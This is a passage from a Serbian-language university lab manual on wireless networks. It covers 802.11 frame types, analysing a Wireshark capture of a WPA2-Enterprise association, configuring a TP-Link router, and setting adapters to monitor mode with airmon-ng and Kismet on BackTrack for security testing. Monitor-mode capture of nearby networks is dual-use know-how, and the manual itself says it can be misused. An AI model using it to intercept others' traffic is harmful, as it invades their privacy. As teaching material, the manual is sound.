услуга, већ првенствено да свој скуп услуга повеже са жичном окосницом мреже, приступна тачка има улогу портала. 48

57 Бежични комуникациони системи Ово су два најчешће коришћена начина организовања бежичних станица. Поред тога, могућ је и једноставнији начин, у коме нема логичког концентратора приступне тачке, већ две или више равноправних станица међусобно размењују податке свако са сваким, без повезивања са другим скуповима услуга или жичаном окосницом. Ово се назива независни основни скуп услуга (Indipendent - IBSS) или Ad-Hoc мрежа. Мрежни адаптери станица у оваквом скупу услуга су у посебном начину рада (Ad-Hoc) јер је у оваквим скуповима одговорност за слање управљачких пакета и синхронизацију часовника дистрибуирана између свих станица. Поред ова три начина рада бежичног мрежног адаптера ( AP, Managed, Ad-Hoc) адаптер може да ради у режиму (моду) пасивног праћења саобраћаја (Monitor, rf-mon). Овај начин рада обично се користи када адаптер користи неки софтвер за праћење мрежног саобраћаја (нпр. Wireshark, Kismet). Када је адаптер у овом режиму обично је неупотребљив за уобичајени мрежни саобраћај. У наставку вежбе погледаћемо снимак саобраћаја који је направљен тако што је адаптер постављен у Monitor начин рада. Управљачки програми за адаптере обично имају јако добру подршку за Managed начин рада као и за Ad-Hoc, док само бољи адаптери имају подршку за AP и Monitor режим рада. 3.5 Врсте пакета Осим разлика у логичкој топологији бежичне мреже користе и сложенији механизам за приступ медијуму. Код Етернета, на пример, користи се CSMA/CD као начин приступа заједничком медијуму. Детекција колизије (CD) омогућава станици да зна да ли је пренос био успешан. Сви рамови података на Eтернет мрежи преносе податке. Код IEEE мрежа, сем рама података, постоје и други типови рама података, као што су контролни рам података, и управљачки рам. Природа медијума спречава станицу да детектује да ли је дошло до колизије пошто станица може или да предаје или да прима рамове. Због тога се у IEEE мрежама користи CSMA/CA (Collision Avoidance). У сваком раму је наведена дужина трајања предаје, а успешан пријем мора се потврдити одговарајућим рамом. Контролни рамови Пошто бежична станица у датом тренутку не може да буде и предајник и пријемник, није могуће као код Етернета користити детекцију колизије, већ се користи избегавање колизије CSMA/CA. Успешан пријем података мора се експлицитно потврдити са друге стране одговарајућим контролним рамом података ( Acknowlеgmenet Frame ). Поред ове врсте контролног рама, постоје и други: RTS и CTS рамови представљају механизам резервације медијума. Уколико се тако конфигурише станица може да користи овај механизам када заузеће медијума пређе конфигурисани праг. PS-Poll рам (Power Save Poll). IEEE стандард предвиђа механизме за штедњу енергије. Овим контролним рамом података станица може да захтева од приступне тачке да јој се пошаљу рамови који су приспели за станицу која је била у режиму штедње енергије. 49

58 III Вежба CF-End, CF-End+CF-ACK контролни рамови. У основном начину рада бежичне станице се надмећу за приступ медијуму, као код Етернета. Овакав приступ медијуму назива се дистрибуиране координационе функције DCF (Distributed Coordinated Function). Сем ослушкивања медијума (Carrier Sence), овај механизам се ослања и на временске интервале који морају да прођу пре него што станица може да приступи медијуму, као и на објављивање дужине трајања преноса у рамовима који се преносе. Поред DCF, дефинисан је начин приступа медијуму у коме приступна тачка уређено прозива станице и нема надметања (Contension Free). Овај начин приступа медијуму се назива централизована координациона функција PCF (Point Coordinated Function). Престанак DCF и почетак PCF начина рада објављује приступна тачка посебним рамом, а CF-End, CF-End+CF-ACK рамови објављују крај оваквог начина рада и повратак на DCF. Управљачки рамови Управљачким рамовим се додељује чланство у скупу услуга: Beacon рамом оглашава се постојање скупа услуга као и његови параметри. Уз помоћ Probe request (захтев) и Probe response (одговор) рамова, станица може проверити постојање приступних тачака скупа услуга, као и јачину сигнала појединих приступних тачака. Authentication и Deauthentication управљачки рамови омогућавају аутентификацију станице пре него што постане члан скупа услуга. Association, Disasociation, Reassociation рамови и управљају чланством станице у скупу података. ATM управљачки рамови података део су механизма за штедњу енергије. 3.6 Преглед снимка саобраћаја На радној станици налазе се фајлови са снимљеним саобраћајем који је направљен програмом Wireshark, при чему је бежични мрежни адаптер постављен у Monitor начин рада. Снимак је прављен током повезивања друге станице на бежичну мрежу. Покренути програм Wireshark, и отворити фајл nefiltrirano.cap Иако је снимање трајало само један минут, снимљена је велика количина података. Употреба нелиценцираног опсега значи да нема регулативе у употреби канала, па се може видети да у околини станице на којој је вршено снимање постоји већи број скупова услуга који користе исте или преклапајуће канале. Саобраћај из туђих скупова услуга станица види као шум у свом скупу услуга. Можемо погледати који су скупови услуга били доступни током снимања саобраћаја: Из менија Statistics изабрати опцију Wlan Traffic... Новоотворени прозор може се и проширити на цео екран. У колони SSID (Service Set ID) приказани су идентификатори скупа услуга, односно имена бежичних мрежа. 50

59 Бежични комуникациони системи Види се да су са локације на којој је вршено снимање, сем мрежа labnet и viser, доступне и друге бежичне мреже. Више приступних тачака може припадати истом проширеном скупу и имати исту SSID ознаку. Проширени скуп услуга потенцијално се састоји од више основних скупова услуга који се индивидуално разликују по ознаци за BSSID (Basic Service Set ID). У колони BSSID наведене су ове ознаке. BSSID представља MAC адресу приступне тачке. Програм Wireshark је првих 24 бита ове адесе (OUID- ознаку произвођача) рашчланио и представио текстуално). Доступне бежичне мреже ESSID и приступне тачке у њима (BSSID) оглашене су Beacon рамовима. У одговарајућој колони приказан је број оваквих рамова. Може се погледати и број осталих врста управљачких и контролних рамова у снимљеном саобраћају. Уочите да су снимљена и четири рама за аутентификацију. Затворити прозор Wireless Trafic. Затворити фајл (File/Close) nefiltritano.cap. У наставку ћемо погледати исти снимак који је филтриран тако да приказује само рамове података са посматране приступне тачке и радне станице. Отворити фајл (File/Open) фајл filtrirano.cap Уочити и погледати детаље рама 1 и 2 ( Beacon рамови): Ово је управљачки рам који приступна тачка повремено емитује на бродкаст адресу. Параметри приступне тачке преносе се као фиксни параметри ( fixed parameters ) и означени параметри ( tagged parameters ). Ова друга врста параметара представља механизам проширења параметара. Уочити следеће информације које се преносе овим рамом: Да ли је ово Beacon рам ad-hoc мреже или BSS? Период објављивања Beacon рама? SSID мреже? Канал који користи ова приступна тачка? Основне и проширене подржане брзине преноса? Сигурносне параметре за шифровање (RSN18)? Уочити рам Probe Request (пакет 3). Ово је управљачки рам којим радна станица жели да провери доступност дате бежичне мреже SSID. У раму који посматрамо SSID није експлицитно наведен (SSID=Broadcast), тако да су се са каснијим одговорима огласиле све приступне тачке које су примиле захтев. 18 Robust Security Network 51

60 III Вежба Уочити рам Probe Response (пакет 4). Ово је управљачки рам којим приступна тачка одговара на претходни затев. Уочити да рам података има поље Duration трајање. IEEE механизам приступа медијуму предвиђа да станице објаве време трајања предаје података. Ово је део механизма CSMA/CA Уочити да рам података има секвенцни број као и број фрагмента механизам приступа медијуму омогућава детекцију дуплих пакета, као и фрагментацију рама података. Уочити параметре којима станица одговара. Уочити рам потврде пријема ( Acknowledgement ) (пакет 5). Ово је контролни тип рама Због природе медијума, само на основу потврде друге стране, станица зна да није дошло до колизије и да је рам успешно примљен. И у наставку снимка сваки рам биће потврђен. Уочити Probe Response рам података који су послале друге приступне тачке у домету (пакет 8 и 9). Следећа фаза је аутентификација станице ка приступној тачки: Уочити ко иницира аутентификацију (пакет 10). Уочити аутентификациони алгоритам који се користи. Уочити да ли је аутентификација била успешна (пакет 12). Ова фаза аутентификације је у оригиналном стандарду представљала једини механизам контроле приступа бежичној мрежи. Оригинално су дефинисана два аутентификациона алгоритма: отворени систем ( Open System ), и WEP (Wired Equivalent Privacy). Први аутентификациони алгоритам у суштини и нема алгоритам и омогућава приступ свима. Други аутентификациони механизам, WEP, је оригинално замишљен да контролише приступ (најчешће аутентификацијом уз помоћ кључа дељеног између станица и приступне тачке) и омогући успостављање материјала за кључеве за шифровања којима би се омогућила заштита саобраћаја еквивалентна оној у жичаној мрежи. Механизам за шифровање предвиђен WEP механизмом настао је као резултат разних компромиса и показао се као веома слаб. Побољшањем IEEE802.11i дефинисани су напреднији механизми заштите који се данас користе. И ако се стварна контрола приступа у овој фази не препоручује, формално су станица и приступна тачка извршиле ову фазу. Стварна контрола приступа, дефинисана у IEEE802.11i одиграла се касније на снимку саобраћаја. Уочити рамове са којима се врши придружување станице приступној тачки (Association Request, Association Response) (пакети 14-17). Циљ придруживања је да се станица региструје код приступне тачке. У току овог процеса станица добија свој идентификатор придруживања. Уочити ову вредност. У дистрибуираном систему важно је да се зна која станица је регистрована код које приступне тачке. 52

61 Бежични комуникациони системи Уколико се као механизам контроле приступа користи WEP дељени кључ, или отворени систем, процес успоставе везе овде би био завршен. Употреба WEP заштите се не препоручује у новој верзији стандарда IEEE Нова верзија стандарда је прихватила IEEE802.11i побољшање и предвиђа чвршће мере аутентификације и заштите саобраћаја. Нови стандард предвиђа мреже веће сигурности (Robust Security Network - RSN) и параметри те мреже се објављују у Beacon и Probe Response рамовима (RSN information унутар Tagged parameters). Погледати RSN information означени параметар у Beacon рамовима (на пример пакет 32). У времену непосредно пре увођења IEEE i стандарда у употребу произвођачи су почели да производе и продају опрему која се придржавала стандарда чије се усвајање очекивало. За ове производе се тврди да подржавају WPA и WPA2 (Wireless Protected Access). Прво унапређење које уводи IEEE i, односно производи који подржавају WPA или WPA2, je употреба напреднијих механизама шифровања. WPA користи алгоритам TKIP (Temporal Key Integrity Protocol) заштиту саобраћаја. Алгоритам TKIP користи исти начин шифровања као и слаби WEP, али кључ за шифровање мења за сваки пакет. Тиме се решава велики проблем који је имао WEP - дуга употреба истог кључа за шифровање. У стандарду се овај протокол предвиђа као прелазно решење за опрему која нема довољно хардверских ресурса за сложенији механизам WPA2 користи (Counter Mode with Cipher Block Chaining Message Authentication Code CCM) који користи напреднији механизам за шифровање. Оваква опрема се у новом стандарду назива RSN опрема. Друго унапређење које је нови стандард донео је и мoгућност динамичног управљања кључевима, као и употреба IEEE 802.1x стандарда за аутентификацију. Уколико се аутентификација станице према приступној тачки изврши уз помоћ IEEE 802.1x протокола и одговарајућег EAP 19 метода, материјал за кључеве за шифровање динамички се генерише при свакој новој аутентификацији. Ово са своје стране захтева постојање централног сервера за аутентификацију, као и постојање инфраструктуре јавних кључева. Подршка за нешто овако обично се приказује као WPA Enterprise или WPA2 Enterprise, у зависности од употребљеног механизма за заштиту. Како би се омогућила употреба система заштите и у малим мрежама које немају сву потребну инфраструктуру, дефинисана је и могућност употребе заједничког, унапред дељеног кључа (Pre Shared Key - PSK). Оваква опрема обично се приказује како WPA Personal или WPA2 Personal, у зависности од употребљеног механизма за заштиту. По снимку саобраћаја може се уочити да бежична мрежа користи RSN (Robust Security Network) систем заштите према стандарду IEEE802.11i, односно оно што је комерцијално познато као WPA2 Enterprise. Уочити почетак 802.1x аутентификације ( Request, Identity, Response, Identity ). Ко иницира аутентификацију? 19 Extensible Authentication Protocol 53

62 III Вежба Ko је корисник који покушава да се аутентификује? EAP протокол омогућава флексибилан договор око механизма за аутентификацију. Који механизам је договорен? (пакет 38) Изабрани механизам одвија се у две фазе: успостава шифрованог тунела а затим и аутентификација уз употребу стварног идентитета корисника. Аутентификација се завршава са EAP-Success пакетом. (пакет 80) Као део RSN механизма одиграва се четвороструки договор (4-way handshake) око кључа за шифровање. Уочити ове кораке. (пакети 82-88) После договора око кључа за шифровање уникаст саобраћаја, изврши се и договор око кључа за шифровање мултикаст и бродкаст саобраћаја. Након овога је успостављена веза станице и приступне тачке. Следи уобичајен DHCP саобраћај. Преглед успоставе везе може се погледати у програму Wireshark: Из менија, изабрати опцију Flow Graph. 3.7 Успостава везе са бежичном мрежом. На основу Beacon рама, као и Probe рама станица може да зна које су бежичне мреже са проширеним скупом услуга (ESSID) доступне, као и оне са основним скупом услуга (BSS), односно приступне тачке у домету. На Linux оперативном систему, програм Network Manager ће приказати доступне мреже. Осим тога, нешто прецизнији преглед може се добити командом iwlist. У командној линији терминалског прозора укуцати: iwlist scanning Уочити следеће информације за мрежу labnet ( ESSID: labnet ) MAC адресу приступне тачке, односно (BSSID)? Да ли је мрежа Ad-Hoc или инфраструктурног типа? На којој фреквенцији-каналу ради доступна приступна тачка? Колики је квалитет сигнала, ниво сигнала, ниво шума? У којим јединицама мере су изражени ниво сигнала и ниво шума? Које су подржане брзине преноса? Који систем заштите се користи? 54

63 Бежични комуникациони системи 3.8 Преглед јачине сигнала И станица и приступна тачка функционишу као предајници, емитујући сигнал одговарајуће снаге. Снага се обично изражава у dbm, као однос снаге предајника у mw према референтној вредности од 1mW. Погледати снагу предајника станице: У командној линији унети: iwlist txpower Колика је снага предајника мрежног адаптера? Осим што снага предајник приступне тачке на месту станице треба да буде довољна, за успешан пренос података важно је и да за снага буде већа од снаге шума осталих приступних тачака на истом или блиским каналима као и шума окружења. Радна станица може да измери снагу сигнала на пријемнику када приступна тачка не врши предају. Снага сигнала као и снага шума могу се видети и командом: iwlist scanning Осим ове алатке може се инсталирати и користити алатка wavemon, којом у реалном времену можемо пратити однос снаге сигнала и шума за приступну тачку на коју смо асоцирани. Полазећи из терминалског прозора отворићемо нову конзолу из које ћемо покренути програм wavemon. У конзоли укуцати: xterm Максимизовати добијени прозор. У прозору xterm конзоле укуцати: wavemon Уочити следеће информације у реалном времену: Ниво сигнала. Ниво шума. Однос нивоа сигнала и шума. У доњем делу екрана налази се линија са менијима. Функцијски тастер F2 приказује хистограм нивоа сигнала, шума, као и односа сигнал/шум. Притиснути F2. Погледати хистограм. Приликом постављања бежичне локалне рачунарске мреже битно је имати представу о домету приступне тачке у објекту. 55

64

65 IV ВЕЖБА ПОДЕШАВАЊЕ БЕЖИЧНЕ ПРИСТУПНЕ ТАЧКЕ Циљ ове вежбе је упознавање студената са уређајима који се користе као бежичне приступне тачке. У вежби је дат детаљан опис свих подешавања уређаја потребних за бежично повезивање клијената на мрежу као и подешавање механизама за заштиту комуникације и контролу приступа.

66 IV Вежба 4. Подешавање бежичне приступне тачке 4.1 Увод На тржишту је доступан велики број уређаја од различитих произвођача, али велика већина ових уређаја подешава се на сличан начин. TP-Link је лидер у производњи уређаја оваквог типа па ћемо у овој вежби користити бежичну приступну тачку TP-Link WR841N. Овај уређај није само једноставна приступна тачка која повезује бежични сегмент мреже са окосницом мреже, већ функционише као рутер, са могућношћу транслирања мрежних адреса. Уређај је пре свега предвиђен за повезивање SOHO 20 бежичне мреже са Интернет посредником. Сем бежичног адаптера и антена, уређај поседује и посебан порт за везу са посредником, као и интерни комутатор за повезивање локалне мреже. Портови овог интерног комутатора користе се и за иницијално конфигурисање уређаја. Да би се извршила иницијална конфигурација потребно је повезати рачунар на интерни комутатор. Мрежни адаптер рачунара који је повезан на интерни комутатор уређаја треба подесити да аутоматски добија IP адресу. Већина уређаја овог типа има фабрички предефинисан DHCP сервер који ће доделити адресе клијентима. За приступ је потребан интернет претраживач пошто се већина уређаја подешава преко web интерфејса. Отворити интернет претраживач и укуцати: Пријавити се као корисник admin са лозинком admin 4.2 Подешавање везе ка локалној мрежи Већина уређаја има предефинисану IP адресу , али на полеђини уређаја (или у упутству) може се тачно видети која се адреса користи, као и параметри за приступ уређају. Администраторски налог за конфигурацију уређаја требало би обавезно променити након првог приступа рутеру како злонамерни корисници не би могли да мењају подешавања самог рутера и на тај начин направе сигурносне пропусте које би касније искористили. Подразумевану адресу рутера можете променити, али није неопходно. У случају да желите, можете то урадити тако што ћете изабрати залистак Network, а затим секцију LAN као на слици Small Ofiice Home Office 58

67 Бежични комуникациони системи Слика 4.1 : Подешавање локалне IP адресе рутера 4.3 Подешавање везе ка Интернету У оквиру залистка Network, секција Wan, између осталог, можемо извршти подешавања везе ка Интернету (или у нашем случају то ће бити веза ка окосници мреже). Слика 4.2 : Подешавање IP адресе рутера ка Интернету На слици 4.2 приказано је подешавање статичке адресе које ћемо користити на вежбама. 59

68 IV Вежба 4.4 Подешавање адреса за локалну мрежу У овој секцији врше се подешавања везана за адресирање у локалној рачунарској мрежи. Ради лакшег разумевања бежичне клијенте треба посматрати као клијенте повезане на интерни комутатор. Слика 4.3 : Подешавање адреса DHCP сервера У овој секцији могу се подешавати опције везане за DHCP сервер (максималан број корисника у локалној мрежи, време изнајмљивања адреса, DNS сервери). Такође може сеподесити и адреса рутера за локалну мрежу (Default Gateway). На залистку DHCP Clients List, могу се видети адресе које су већ изнајмљене, као и имена клијената којима су изнајмљене. Имена клијената представљају имена рачунара, односно било ког уређаја који је бежично или жично приступио мрежи. Занимљива, а свакако и корисна подешавања су подешавања резервација адреса за одређене клијенте. Ако у мрежи на пример имамо неки FTP сервер или мрежни штампач, логично је да желимо да они имају увек исту адресу како би корисници могли да им приступе. У оквиру опције Address Reservation можемо резервисати адресе, тако што ћемо навести MAC адресу жељеног уређаја и уписати IP адресу коју он треба да добије. На слици 4.4 можемо видети подешавања за резервацију адреса. 60

69 Бежични комуникациони системи Слика 4.4 : Подешавање резервације адреса 4.5 Подешавање прослеђивања адреса У оквиру подешавања бежичног рутера налази се и залистак Forwarding. Када кликнете на њега отварају се 4 нове секције, од којих је најзанимљивија за подешавање прва секција, односно Virtual Servers. Слика 4.5 приказује изглед дијалог - прозора за подешавање виртуелних сервера. Слика 4.5 : Подешавања за прослеђивање портова 61

70 IV Вежба Виртуелни сервер представља било који засебан рачунар или мрежни адаптер унутар ваше приватне мреже. Као што је већ познато, приватној мрежи није могуђе приступити споља. Ако се у локалној мрежи налази неки сервер, коме приступају клијенти са спољне мреже (нпр. Интернета), рутер се мора подесити да пропусти тај саобраћај. То пропуштање у ствари представља прослеђивање захтева споља, ка неком вашем уређају у локалној приватној мрежи. Као што се види на слици 4.5, морате дефинисати порт, IP адресу, као и протокол који се користи, како би рутер знао коме шта треба да проследи. У оквиру залиска Forwarding, налази се и секција DMZ (Demilitarized Zone). Демилитаризована зона представља у нашем случају IP адресу ка којој се прослеђује било који захтев који стигне споља. Обратите пажњу на то да је за разлику од подешавања виртуелних сервера, односно прослеђивања специфичног порта и протокола, код демилитаризоване зоне све дозвољено. То значи да ће било који захтев који стигне споља бити прослеђен да адресу која је специфицирана у подешавањима за демилитаризовану зону. На слици 4.6 приказан је изглед дијалога за подешавање демилитаризоване зоне. Слика 4.6 : Подешавање IP адресе за демилитаризовану зону 4.6 Подешавање бежичне мреже Изабрати залистак Wireless, секција Wireless Settings (слика 4.7): Идентификатор скупа сервиса поставити на BKS-1 (односно на BKS-2 за други уређај, BKS-3 за трећи уређај, итд...). За регион изабрати неку европску земљу уколико се наша земља не налази на листи. Опцију Channel поставити на 1 (6 за други уређај, односно 11 за трећи уређај). Опцију Mode поставити на 11bgn mixed. Ширину канала оставити на Automatic. 62

71 Бежични комуникациони системи Брзину преноса оставити на 300Mbps. Слика 4.7 : Подешавање основних бежичних параметара У овој секцији можемо подесити бежичну приступну тачку да не оглашава свој идентификатор скупа сервиса (SSID), што ћемо користити у једној од наредних вежби. 4.7 Подешавање безбедности бежичне мреже Изабрати залистак Wireless, а затим картицу Wireless Security. На овој страници можемо одабрати механизам контроле приступа који желимо да користимо. Код WEP протокола можемо одабрати дужину кључа коју желимо да користимо (40/64-bit, 104/128-bit или 128/154-bit). Можемо одабрати тип аутентификације, да ли ће она бити отвореног типа или ће користити дељени кључ. Такође можемо одабрати ког ће формата бити наша лозинка - хексадецимални или ASCII кôд. Напомена: Употреба WEP заштите се не препоручује у верзији стандарда из године. Овај систем заштите не треба примењивати код конфигурације бежичних мрежа, ми ћемо га користити у лабораторијским условима искључиво за анализу алгоритама. На слици 4.8 је приказан прозор за конфигурацију WEP-а. 63

72 IV Вежба Слика 4.8 : Подешавање WEP механизма заштите WPA-PSK и WPA2-PSK протоколи користе читаву хијерархију кључева за шифровање, и потврду интегритета кључева. Ови механизми заштите су доста напреднији и препоручује се њихово коришћење. Да бисмо конфигурисали WPA2 механизам заштите за SOHO мреже потребно је (слика 4.9): Опцију Version поставити на WPA2-PSK. Опцију Encription поставити на AES. У пољу PSK Password треба унети дељени кључ. 64

73 Бежични комуникациони системи Слика 4.9 : Подешавање WPA-PSK/WPA2-PSK заштите WPA/WPA2 механизам заштите најчешће се користи у системима који имају већу мрежну инфраструктуру, али може секористити и код мањих фирми ако је тајност података од највећег значаја. За разлику од WPA-PSK/WPA2-PSK где постоји само дељени кључ који поседују клијенти и бежична приступна тачка, код WPA/WPA2 систем кључева је мало другачији. WPA/WPA2 се назива још WPA/WPA2 Enterprise и захтева постојање неког сервера за аутентификацију, што додатно компликује систем. Као сервер за аутентификацију најчешће се користи RADIUS сервер који проверава да ли клијент који жели да приступи мрежи постоји у бази клијената. За разлику од WPA-PSK/WPA2-PSK код WPA/WPA2 Enterprise клијент се пријављује комбинацијом корисничко име/лозинка, па је сигурност подигнута на виши ниво. На слици 4.10 приказан је прозор за подешавање WPA/WPA2 Enterprise заштите. Подешавања везана за инсталацију и конфигурацију RADIUS сервера детаљно ће бити описана у наредним вежбама. 65

74 IV Вежба Слика 4.10 : Подешавање WPA/WPA2 Enterprise заштите 4.8 Контрола приступа коришћењем MAC адреса На овом уређају такође се може подесити контрола приступа по MAC адресама. Овим подешавањем можемо одредити којим клијентима је дозвољено (или забрањено) да приступе бежичној мрежи (слика 4.11). 66

75 Бежични комуникациони системи Слика 4.11 : Подешавање филтрирања по MAC адресама Погледати подешавања у секцији Wireless Advanced (слика 4.12). Нека од подешавања су: Слика 4.12 : Додатна подешавања бежичног приступа Transsmit Power - представља излазну снагу предајника. Beacon Interval - временски период на који ће бежични рутер оглашавати своје присуство. RTS Treshold праг величине оквира који активира RTS/CTS резервацију медијума Fragmentation Treshold праг величине оквира који активира фрагментацију оквира. 67

76 IV Вежба У оквиру секције Wireless Statistics могу се видети корисници који су тренутно на бежичној мрежи као и додатне информације везане за њих (слика 4.13). Слика 4.13 : Статистика бежичних клијената 68

77 V ВЕЖБА НАДГЛЕДАЊЕ БЕЖИЧНОГ МРЕЖНОГ САОБРАЋАЈА Циљ вежбе је упознавање студената са посебном дистрибуцијом Linux оперативног система - Back Track, која ће се користити за тестирање бежичних мрежа. Биће такође обрађено и коришћење Kismet алата за скенирање мрежног саобраћаја. Вежба обухвата и рад са напредним опцијама Wireshark програма за анализу мрежног саобраћаја.

78 V Вежба 5. Надгледање бежичног мрежног саобраћаја 5.1 Снимање бежичног мрежног саобраћаја Тестирање механизама заштите код бежичних рачунарских мрежа вршићемо уз помоћ Linux дистрибуције оперативног система BackTrack. BackTrack je базиран на Ubuntu, односно Debian дистрибуцији Linux-a. Намењен је раду у области ИТ сигурности, првенствено за тестирање могућности пенетрације у рачунарске мреже и системе, дигиталну форензику и истрагу. Може користити KDE (K Desktop Environment) или GNOME интерфејс и поседује мноштво сигурносних алата и алата за рачунарску форензику, а саму колекцију алата је могуће једноставно ажурирати и проширивати преузимањем из респозиторијума који су доступни на Интернету. BackTrack је настао спајањем Auditor Security Linux-a са WHAX (некадашњи Wхоppix). Актуелну верзију оперативног система потражити на официјалном сајту 21, у тренутку писања овог приручника актуелна верзија је била BackTrack 5 R3 и она ће се корстити у примерима. BackTrack се може инсталирати и користити као примарни оперативни систем, а може се покретати са LiveDVD-a или USB меморијског штапића. 5.2 BackTrack Да бисмо покренули BackTrack са Live DVD/USB-а потребно је подесити у BIOS-у редослед бутабилних уређаја. Када се систем подигне потребно је унети команду startx како бисмо покренули графичко корисничко окружење. Активност 1: Упознавање са радним окружењем BаckTrack Упознавање са радним окружењем BаckTrack 5 R2 Linux оперативног система. Активност 2: Преглед активних мрежних адаптера Отворити терминалску конзолу: Start / System / Konsole Укуцати: ifconfig Који су мрежни адаптери тренутно активни? Да бисмо видели све мрежне адаптере који су доступни на рачунару, чак и оне који нису активни, треба унети команду: ifconfig -a Колико мрежних адаптера постоји и како су означени? Које су њихове IP адресе? Ако желимо да активирамо неки од доступних адаптера (нпр. wlan0) потребно је унети следећу команду у прозор терминала:

79 Бежични комуникациони системи ifconfig wlan0 up За деактивирање мрежног адаптера користи се следећа команда: ifconfig wlan0 down На основу претходних команди може се приметити да мрежни адаптери немају иницијално подешене IP адресе. Подешавање IP адреса може се извршити статички или аутоматски ако имамо DHCP сервер у локалној мрежи. За потребе ове вежбе потребно је подесити један од мрежних адаптера на рачунару како бисмо извршили иницијално подешавање бежичне приступне тачке. Пошто уређај који ћемо користити на вежбама по фабричким подешавањима већ функционише као DHCP сервер, само је потребно подесити да мрежни адаптер, којег смо повезали на интерни комутатор уређаја, аутоматски добија IP адресу. Активност 3: Подешавање мрежног адаптера на Linux оперативном систему Отворити терминалску конзолу: Start / System / Konsole Укуцати: dhclient eth0 Са овом командом смо подесили мрежни адаптер са ознаком eth0 да аутоматски прима адресу од DHCP сервера. Да бисмо видели адресу коју нам је доделио DHCP сервер, потребно је укуцати следећу команду: ifconfig eth0 Која је адреса додељена мрежном интерфејсу? Додатне информације: У случају да је потребно да статички подесимо неки од мрежних адаптера користили бисмо следеће команде: за подешавање статичке IP адресе користи се команда - ifconfig <назив адаптера> <адреса> netmask <маска подмреже>, (нпр. ifconfig eth netmask или једноставније - ifconfig eth /8); за подешавање подразумеваног мрежног пролаза користи се команда route add default gw <адреса мрежног пролаза>, (нпр. route add default gw ); командом route, без аргумената, можемо видети табелу рутирања; да бисмо статички подесили адресе DNS сервера потребно је изменити resolv.conf датотеку која се налази у /etc директоријуму, уз помоћ неког текст едитора који постоји у Linux оперативном систему (нпр. nano /etc/resolv.conf и затим унети адресу сервера nameserver ); преглед подешених адреса DNS сервера може се извршити командом - cat /etc/resolv.conf. 5.3 Монитор режим рада бежичног мрежног адаптера Монитор режим рада или RFMON (Radio Frequency Monitor) омогућава рачунарима који поседују бежични мрежни адаптер да прате сав саобраћај који се одвија преко бежичних мрежа. 71

80 V Вежба За разлику од мешовитог (promiscuous) режима рада, који се такође користи за анализу пакета на мрежи, монитор режим рада омогућава снимање пакета без претходног придруживања са приступном тачком или Ad-hoc мрежом. Монитор режим рада може сеприменити само на бежичне мрежне адаптере, док промискуитетни режим рада може бити коришћен и код етернет адаптера. Овај начин рада може бити користан код праћења саобраћаја у локалној бежичној рачунарској мрежи и код пројектовања бежичних мрежа. Због наведених карактеристика овај режим рада се нажалост може употребљавати и за скенирање и сакупљање података са туђих бежичних мрежа. Када се адаптер налази у монитор режиму рада он не може бити повезан на неку бежичну приступну тачку или Ad-hoc мрежу. Старији Windows оперативни системи нису подржавали овај режим рада бежичних мрежних адаптера, појавом Windows Vista и Windows 7 оперативног система јавила се могућност подешавања овог режима рада и на Windows ОС. Постоје и произвођачи бежичних мрежних адаптера који издају посебне уређаје и драјвере како би омогућили монитор режим рада и на старијим Windows ОС. Код Linux оперативних система постоји велики број драјвера који подржавају ову опцију. Коришћење airmon-ng скрипте може бити један од начина да подесимо бежични адаптер за рад у монитор режиму. Такође, иста скрипта може секористити за враћање у нормални (Managed) режим рада. Скрипта се користи на следећи начин: airmon-ng <start stop> < назив адаптера> [бр. канала] или airmon-ng <check check kill> start stop опције се користе за покретање монитор режима рада, односно његово заустављање; можемо одредити само један канал на коме ће мрежна картица прислушкивати мрежни саобраћај; check опција даје приказ свих процеса који могу доћи у колизију са airmon-ng скриптом; check kill опција проверава и аутоматски зауставља такве процесе; ако се унесе airmon-ng команда без аргумената добија се приказ статуса мрежних адаптера. Активност 4: Постављање бежичног мрежног адаптера у монитор режим рада Отворити терминалску конзолу: Start / System / Konsole Како би нам оперативни систем приказао бежичне мрежне адаптере, односно који мрежни адаптери подржавају проширења за управљање бежичним адаптерима, потребно је унети следећу команду: iwconfig Како је означен бежични адаптер? 72

81 Бежични комуникациони системи Који стандард подржава адаптер (IEEE802.11?). Које су подржане брзине преноса? На којој фреквенцији тренутно ради адаптер? Да бисте поставили бежични мрежни адаптер у монитор режим рада укуцајте седеће: airmon-ng start wlan0 Како бисте утврдили да ли је мрежни адаптер у монитор режиму рада, потребно је поновити команду: iwconfig Може се приметити да је креиран нови адаптер mon0 који се налази у монитор режиму рада. Када желимо да подесимо адаптер да ради у нормалном режиму рада потребно је извршити следећу команду: airmon-ng stop mon0 У зависности од верзије драјвера која се користи на систему овај процес се може незнатно разликовати, као и називи бежичних мрежних адаптера који се користе. 5.4 Преглед доступних мрежа програмом Kismet Kismet је програм који врши детекцију доступних IEEE мрежа, ослушкивање саобраћаја ( sniffer ) и детектује покушаје напада на мрежу (Intrusion Detection System). Програм ради са мрежним адаптерима који подржавају rfmon, односно monitor начин рада. Може се поставити питање зашто желимо да вршимо детекцију доступних бежичних мрежа и да ослушкујемо мрежни саобраћај. Детекција мрежа може бити корисна, на пример, у случају када желимо да поставимо бежичну приступну тачку за нашу локалну мрежу. Пре него што одредимо на ком каналу ће наша бежична приступна тачка радити, можемо искористити програм Kismet како бисмо детектовали суседне бежичне мреже, као и канале на којима оне раде. Такође уз помоћ овог програма можемо видети и јачину сигнала који потиче од суседних бежичних мрежа. Добијене информације можемо искористити да подесимо нашу приступну тачку да ради на одређеном каналу како би се избегло преклапање фреквенцијског опсега са суседним мрежама, и самим тим избегла појава сметњи. Kismet врши детекцију пасивним ослушкивањем саобраћаја, мењајући при томе канал на коме ради адаптер, тако да може да открије и бежичне мреже које се не објављују Beacon оквирима. Сем детекције у реалном времену програм врши записивање саобраћаја у неколико формата, па се резултати снимљеног саобраћаја могу касније увести у програм Wireshark, програм за табеларне прорачуне или програм за откривање слабости употребљене заштите ( Airsnort ). Програм се састоји из серверске и клијентске компоненте. Серверска компонента се мора покренути под повишеним привилегијама. Ова компонента врши подешавање адаптера, ослушкује бежични саобраћај и врши записивање резултата. Клијентска компонента комуницира са серверском и омогућава кориснику преглед саобраћаја у реалном времену. 73

